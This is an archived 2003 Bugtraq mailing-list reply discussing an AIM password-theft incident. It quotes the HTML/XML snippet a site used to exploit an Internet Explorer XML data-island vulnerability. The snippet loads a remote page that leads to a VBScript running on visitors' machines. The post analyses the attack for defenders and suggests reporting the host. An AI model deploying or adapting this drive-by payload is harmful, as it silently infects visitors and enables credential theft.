| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 23 Sep 2003 15:50:23 -0700 (PDT) From: S G Masood <sgmasood@...oo.com> To: bugtraq@...urityfocus.com Subject: RE: [Fwd: Re: AIM Password theft] Hi Mark, www.Haxr.org uses the "XML Page Object Type Validation Vulnerability" [1] to infect IE users automatically. Here is the code from the site: <span datasrc="#oExec" datafld="counter" dataformatas="html"></span> <xml id="oExec"> <security> <counter> <![CDATA[ <object data=tracker.php></object> ]]> </counter> </security> </xml> This is almost an exact copy of the PoC exploit posted for this vuln. tracker.php points to the exec.vbs script that you posted. This finally gets executed on the victim machine and does its stuff. >If this is new, its going to spread like wildfire. It will infect many machines but IMO, it wouldn't exactly spread like "wildfire" 'coz it has a "single point of failure". Have you considered complaining to the hosting service of www.haxr.org? -- Regards, S.G.Masood Hyderabad, India -- __________________________________ Do you Yahoo!? Yahoo! SiteBuilder - Free, easy-to-use web site design software http://sitebuilder.yahoo.com
Powered by blists - more mailing lists